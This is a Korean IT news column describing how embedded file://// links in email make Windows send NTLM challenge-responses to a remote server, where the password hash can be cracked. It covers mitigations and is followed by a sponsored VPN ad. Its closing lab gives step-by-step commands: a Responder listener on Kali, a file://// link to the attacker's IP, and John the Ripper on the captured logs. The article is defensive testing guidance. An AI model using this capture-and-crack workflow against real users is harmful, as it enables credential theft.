이후 케빈은 필자에게 이메일을 하나 보냈는데, 이 이메일을 열자 케빈에게 필자의 마이크로소프트 윈도우 비밀번호 해시가 전송됐고 캐빈은 이 해시를 크랙했다. 완전한 KO패였다. 필자는 이런 공격이 가능하다는 사실조차 몰랐다.
단순히 공격의 존재를 몰랐다는 것보다 더 충격적인 점은 수년 전부터 이미 광범위하게 알려진 공격이라는 사실이다. 컴퓨터 보안 전문가 관점에서도 부끄럽지만 필자는 명색이 윈도우 인증 전문가로서 두 배로 부끄러운 노릇이다. 이 사건 이후 알아보니, 대부분의 컴퓨터 보안 전문가는 이런 공격이 가능하다는 사실을 몰랐다.
이와 같은 비밀번호 해시 크랙이 가능한 이유는 특정 상황에서(이 상황은 만들기 쉽다) 이메일에 내장된 링크를 통해 컴퓨터에서 원격 서버로 인증을 시도한다는 데 있다. 그러면 원격 서버는 컴퓨터의 인증 시도를 포착하고, 이 정보를 사용해 비밀번호 해시를 찾아 크랙할 수 있다.
간단히 정리하면 필자가 독자들에게 이메일을 보내 비밀번호 해시를 알아낸 다음, 이 해시를 일반 텍스트 비밀번호로 크랙할 수 있다는 이야기다.
이메일을 통해 비밀번호 해시를 알아내는 것이 가능한 이유
컴퓨터는 소프트웨어를 통해 웹 서버 연결을 시도할 때 기본적으로 인증 없이 연결을 시도하는 경우가 많다. 한 번 이상 연결에 실패하면 컴퓨터는 보통 현재 활성 로그온 인증 정보를 사용해 로그온하라는 요청을 받게 된다. 윈도우 통합 인증을 지원하는 컴퓨터는 사용자의 윈도우 인증 정보를 사용해 자동으로 로그온을 시도할 수 있다. 사용자는 무슨 일이 일어났는지 모른다. 자동화된 인증이 실패하면 이후 사용자에게 수동 로그온 메시지가 표시된다.자동 통합 윈도우 인증은 특히 로컬 리소스 및 이전에 신뢰성이 확인된 서버에서 꼭 필요한 싱글사인온(SSO) 기능이다. 이 기능은 사용자가 다른 서버에 연결할 때마다 로그온 인증 정보를 제출할 필요없이 회사 환경 전체에서 웹 서버에 연결할 수 있게 해준다. 현재 널리 사용되는 브라우저는 대부분 다양한 범위에서 이 기능을 지원한다.
1990년대 후반 악성 해커들은 이 기능을 악용해 사용자의 윈도우 인증 정보를 캡처했다. 사용자에게 이메일을 보내서 링크를 클릭하도록 유도하면(또는 투명한 1픽셀로 만들어진 내장된 웹 비컨을 사용해 사용자의 이메일 클라이언트가 사용자 모르게 응답하도록 함) 사용자의 컴퓨터는 무단 서버에 보이지 않게 연결된다. 윈도우 통합 인증이 활성화된 경우(대부분 활성화되어 있음) 사용자의 컴퓨터는 무단 원격 웹 서버에 사용자의 회사 인증 정보를 전송한다.
정확히 말하면 전송되는 것은 사용자의 LAN 매니저(LM) 또는 윈도우 NT LM 네트워크 인증 시도 응답(challenge response)이다. 이 정보에서 사용자의 LM 또는 NT 해시를 계산할 수 있다.
마이크로소프트는 이에 대응해 사용자의 윈도우 인증 정보를 로컬 네트워크 외부의 서버로 보내는 기본 동작을 비활성화했다. 마이크로소프트는 인터넷 익스플로러 버전 4~5를 전후해서 새로운 기본 기능을 활성화했으며 지금까지도 인터넷 익스플로러의 고급 구성 설정에서 열 수 있다(인터넷 옵션, 고급, 통합된 윈도우 인증 사용). 이 조치로 해당 공격이 차단됐고 필자도 그렇게 믿었다.
그러나 알고 보니 윈도우(및 다른 윈도우 통합 인증 지원 소프트웨어 프로그램, 예를 들어 구글 크롬 등)를 속여 NTML 네트워크 인증 시도를 원격 서버로 보내도록 하는 방법은 여전히 존재한다. 필자가 아는 한 사례는 file:////<serverhostaddress>/<anyfilename> 형식으로 된 내장 링크를 사용한다. 예를 들면 다음과 같다.
file:////contoso.com/index.html
contoso.com을 유효한 원격 서버 도메인 이름으로 바꾸면 소프트웨어는 TCP 포트 445를 통해 NTLMv2 연결(기본값)로 SMB/NetBIOS를 사용해서 원격 서버에 인증을 시도한다. 유효한 SMB/NetBIOS 시도로 NTLMv2 연결에 응답할 수 있는 NetBIOS 리스너가 실행되고 있다면 서버는 클라이언트의 NTLMv2 시도 응답을 받는데, 여기서 사용자의 NT 해시를 계산할 수 있다. 여기까지 왔다면 그 다음은 해시를 크랙하거나 시도와 응답을 다시 수행해서 다른 원격 우회를 시도하거나, 선택의 문제일 뿐이다.
TCP 포트 445의 아웃바운드를 차단하지 않은 한, 인터넷 익스플로어에서 윈도우 통합 인증이 어떻게 설정돼 있든 관계없이 이 방법은 통한다. 케빈이 이를 입증한 이후 많은 사람이 필자에게 더 자세한 내용을 묻기 위해 연락을 했다. 당시에는 자세한 부분을 알지 못했지만 그 사이 여러 테스트를 통해 지금은 어떤 방법이 통하고 통하지 않는지 웬만큼 파악했다.
물론 가장 중대한 발견은 내장 file://// 링크를 클릭하면 자신의 NTLM 시도 응답이 원격 서버로 전송되고, 거기서 NT 해시가 크랙될 수 있다는 것이다. 이 방법은 다음 조건에서 통한다.
- 로컬 네트워크 및 인터넷을 통해 원격으로
- 완벽하게 패치된 시스템의 기본 구성에서
- 윈도우 방화벽 기본 상태에서
- 로컬 SAM 계정과 액티브 디렉터리 계정에서 모두
원격 공격자는 컴퓨터 이름, 도메인 이름, NTLMv2 시도 응답을 손에 넣는다. 좋지 않은 소식이지만, 대부분의 기업 환경에서 이 공격 방법이 통한다.
이 공격에 대응할 수 있는 해결책
좋은 소식은 완전히 패치된 시스템에서 이메일을 열더라도 그 안의 링크를 클릭하지만 않으면 어떠한 공격도 통하지 않는다는 것이다. 마이크로소프트의 어느 패치에는 마이크로소프트 오피스 365의 RTF 이메일을 사용할 경우, 성공할 수 있는 오래된 공격 방법이 언급되어 있지만 지금은 이 경로도 막힌 것으로 보인다. 다행이다. 단순히 이메일을 여는 것만으로 공격에 이용당하는 상황은 누구도 원치 않는다. 다만 모두가 알다시피 사용자에게 클릭을 유도하기란 그다지 어려운 일이 아니다. 하지만 일단 클릭하면 해당 사용자의 회사 비밀번호가 유출될 수 있다.필자의 또 다른 친구이며 유능한 사이버보안 분석가인 롭 톰킨스는 직접 여러가지 테스트를 했다. 톰킨스는 필자가 발견한 사항을 확인하고 다양한 소프트웨어 프로그램에서 이를 테스트했는데, 몇 가지 흥미로운 결론에 도달했다. 가장 중요한 점은 회사 네트워크에서 무단 아웃바운드 SMB/NetBIOS 연결을 차단하기 위해 TCP 포트 445를 막는다 해도 모바일 디바이스의 로컬 방화벽에서 이 포트를 닫지 않은 경우 해당 디바이스가 회사 네트워크를 벗어나 있을 때 NTLM 시도 응답을 성공적으로 전송할 수 있다는 것이다. 중요한 발견이다. 롭은 에일리언볼트(AlienVault) 규칙/서명이 이러한 유형의 공격을 인식해서 고객을 보호한다는 사실도 발견했다.
마이크로소프트 패치 설치
마이크로소프트는 2017년 11월 윈도우 10, 윈도우 서버 2016에만 제공되는 패치와 레지스트리 설정을 게시했다. 이 설정을 위해서는 윈도우 방화벽을 활성화하고 NTLM SSO를 사용하도록 허용되는 네트워크와 허용되지 않는 네트워크를 정의해야 한다. 이와 같은 요구 사항은 곧 많은 조직이 이 설정을 사용할 수 없음을 의미한다. 또한 출처는 불분명하지만 회사에서 허용되는 네트워크를 정확히 정의하지 않았다가 서비스가 중단되는 사태를 겪었다는 이야기도 돌고 있으니, 사용하려면 철저한 테스트와 신중한 접근이 필요하다.
강한 비밀번호 사용, 무단 인증 포트 차단
아무리 강력한 비밀번호 크랙 툴이라도 크랙할 수 없을 만큼 충분한 엔트로피의 강력한 비밀번호가 최선이다. 강력한 비밀번호가 1차 방어선이 되어야 한다. 또한 일반적인 필터링 방법을 사용해 SMB/NetBIOS 등 승인되지 않은 송신 인증을 차단하는 것은 당연하고, file:////도 필터링하는 것이 좋다.
이 취약점을 테스트하는 방법
조직과 조직에서 사용하는 소프트웨어가 얼마나 취약한지 확인하려면 윈도우 클라이언트와 리눅스 서버, 두 개의 컴퓨터로 구성된 실험실을 간단히 설정해 바로 테스트를 시작할 수 있다. 방법은 다음과 같다.먼저 로렌트 재피의 파이썬 기반 리스폰더(Responder)라는 유틸리티를 받는다. 리스폰더는 네트워크 기반 비밀번호 해시의 도난 상황을 살피기 위한 매우 유용한 툴로, LLMNR(마이크로소프트 윈도우 로컬 이름 확인 프로토콜), NetBIOS 및 멀티캐스트 DNS(mDNS)를 자동으로 '오염'시킬 수 있는 무단 서버(웹, NetBIOS, SQL, FTP, LDAP) 역할을 한다. 인터넷에서 리스폰더를 사용해서 NTLM 시도 응답을 오염시켜 포착하는 사람들의 동영상을 많이 찾아볼 수 있다.
리스폰더를 적절히 설정하는 데 소비되는 시간을 아끼려면 칼리 리눅스(Kali Linux)를 다운로드해서 실행하고 다음과 같이 설정한다.
1. root로 로그인한다. 비밀번호는 toor다.
2. 애플리케이션(Applications) 메뉴를 클릭하고 09-스니핑 및 스푸핑(09 - Sniffing and Spoofing)을 선택한 다음 리스폰더를 실행한다.
3. 그런 다음 responder -I eth0 –v(수신 대기하는 IP 주소를 기록)를 실행한다.
윈도우 컴퓨터에서는
1. 파일 탐색기를 열고 file:////<linuxIPaddress>/test.htlm(다른 파일 이름이라도 무관함)에 연결한다.
2. 리스폰더가 NTML 시도 응답을 획득한다.
해시를 크랙하려면 리눅스 컴퓨터로 돌아가서 다음과 같이 한다.
1. 터미널 세션을 시작한다.
2. cd /usr/share/responder/logs를 입력한다.
3. 존 더 리퍼(John the Ripper)를 실행해서 로그 파일의 해시를 크랙한다.
john HTTP-NTLMv2… or john SMB….
해킹은 정말 재미있다. 해킹 툴을 사용해 되는 것과 안 되는 것을 탐색하는 것만큼 재미있는 일도 없다. 물론 필자는 이메일의 내장된 링크를 클릭하면 안 된다는 것을 배웠으니 앞으로 그럴 일은 절대 없을 것이다. 클릭했다가는 다치는 수가 있다. editor@itworld.co.kr
함께 보면 좋은 콘텐츠
Sponsored
Surfshark
“유료 VPN, 분명한 가치 있다” VPN 선택 가이드
ⓒ Surfshark VPN(가상 사설 네트워크, Virtual Private Network)은 인터넷 사용자에게 개인 정보 보호와 보안을 제공하는 중요한 도구로 널리 인정받고 있다. VPN은 공공 와이파이 환경에서도 데이터를 안전하게 전송할 수 있고, 개인 정보를 보호하는 데 도움을 준다. VPN 서비스의 수요가 증가하는 것도 같은 이유에서다. 동시에 유료와 무료 중 어떤 VPN을 선택해야 할지 많은 관심을 가지고 살펴보는 사용자가 많다. 가장 먼저 사용자의 관심을 끄는 것은 별도의 예산 부담이 없는 무료 VPN이지만, 그만큼의 한계도 있다. 무료 VPN, 정말 괜찮을까? 무료 VPN 서비스는 편리하고 경제적 부담도 없지만 고려할 점이 아예 없는 것은 아니다. 보안 우려 대부분의 무료 VPN 서비스는 유료 서비스에 비해 보안 수준이 낮을 수 있다. 일부 무료 VPN은 사용자 데이터를 수집해 광고주나 서드파티 업체에 판매하는 경우도 있다. 이러한 상황에서 개인 정보가 유출될 우려가 있다. 속도와 대역폭 제한 무료 VPN 서비스는 종종 속도와 대역폭에 제한을 생긴다. 따라서 사용자는 느린 인터넷 속도를 경험할 수 있으며, 높은 대역폭이 필요한 작업을 수행하는 데 제약을 받을 수 있다. 서비스 제한 무료 VPN 서비스는 종종 서버 위치가 적거나 특정 서비스 또는 웹사이트에 액세스하지 못하는 경우가 생긴다. 또한 사용자 수가 늘어나 서버 부하가 증가하면 서비스의 안정성이 저하될 수 있다. 광고 및 추적 위험 일부 무료 VPN은 광고를 삽입하거나 사용자의 온라인 활동을 추적하여 광고주에게 판매할 수 있다. 이 경우 사용자가 광고를 보아야 하거나 개인 정보를 노출해야 할 수도 있다. 제한된 기능 무료 VPN은 유료 버전에 비해 기능이 제한될 수 있다. 예를 들어, 특정 프로토콜이나 고급 보안 기능을 지원하지 않는 경우가 그렇다. 유료 VPN의 필요성 최근 유행하는 로맨스 스캠은 인터넷 사기의 일종으로, 온라인 데이트나 소셜 미디어를 통해 가짜 프로필을 만들어 상대를 속이는 행위다. 이러한 상황에서 VPN은 사용자가 안전한 연결을 유지하고 사기 행위를 방지하는 데 도움이 된다. VPN을 통해 사용자는 상대방의 신원을 확인하고 의심스러운 활동을 감지할 수 있다. 서프샤크 VPN은 구독 요금제 가입 후 7일간의 무료 체험을 제공하고 있다. ⓒ Surfshark 그 외에도 유료 VPN만의 강점을 적극 이용해야 하는 이유는 다음 3가지로 요약할 수 있다. 보안 강화 해외 여행객이 증가함에 따라 공공 와이파이를 사용하는 경우가 늘어나고 있다. 그러나 공공 와이파이는 보안이 취약해 개인 정보를 노출할 위험이 있다. 따라서 VPN을 사용하여 데이터를 암호화하고 개인 정보를 보호하는 것이 중요하다. 서프샤크 VPN은 사용자의 개인 정보를 안전하게 유지하고 해킹을 방지하는 데 유용하다. 개인정보 보호 인터넷 사용자의 검색 기록과 콘텐츠 소비 패턴은 플랫폼에 의해 추적될 수 있다. VPN을 사용하면 사용자의 IP 주소와 로그를 숨길 수 있으며, 개인 정보를 보호할 수 있다. 또한 VPN은 사용자의 위치를 숨기고 인터넷 활동을 익명으로 유지하는 데 도움이 된다. 지역 제한 해제 해외 여행 중에도 한국에서 송금이 필요한 경우가 생길 수 있다. 그러나 IP가 해외 주소이므로 은행 앱에 접근하는 것이 제한될 수 있다. VPN을 사용하면 지역 제한을 해제해 해외에서도 한국 인터넷 서비스를 이용할 수 있다. 따라서 해외에서도 안전하고 편리하게 인터넷을 이용할 수 있다. 빠르고 안전한 유료 VPN, 서프샤크 VPN ⓒ Surfshark 뛰어난 보안 서프샤크 VPN은 강력한 암호화 기술을 사용하여 사용자의 인터넷 연결을 안전하게 보호한다. 이는 사용자의 개인 정보와 데이터를 보호하고 외부 공격으로부터 사용자를 보호하는 데 도움이 된다. 다양한 서버 위치 서프샤크 VPN은 전 세계 곳곳에 여러 서버가 위치하고 있어, 사용자가 지역 제한된 콘텐츠에 액세스할 수 있다. 해외에서도 로컬 콘텐츠에 손쉽게 접근할 수 있음은 물론이다. 속도와 대역폭 서프샤크 VPN은 빠른 속도와 무제한 대역폭을 제공하여 사용자가 원활한 인터넷 경험을 누릴 수 있도록 지원한다. 온라인 게임, 스트리밍, 다운로드 등 대역폭이 필요한 활동에 이상적이다. 다양한 플랫폼 지원 서프샤크 VPN은 다양한 플랫폼 및 디바이스에서 사용할 수 있다. 윈도우, 맥OS, iOS, 안드로이드 등 다양한 운영체제 및 디바이스에서 호환되어 사용자가 어디서나 안전한 인터넷을 즐길 수 있다. 디바이스 무제한 연결 서프샤크 VPN은 무제한 연결을 제공하여 사용자가 필요할 때 언제든지 디바이스의 갯수에 상관없이 VPN을 사용할 수 있다.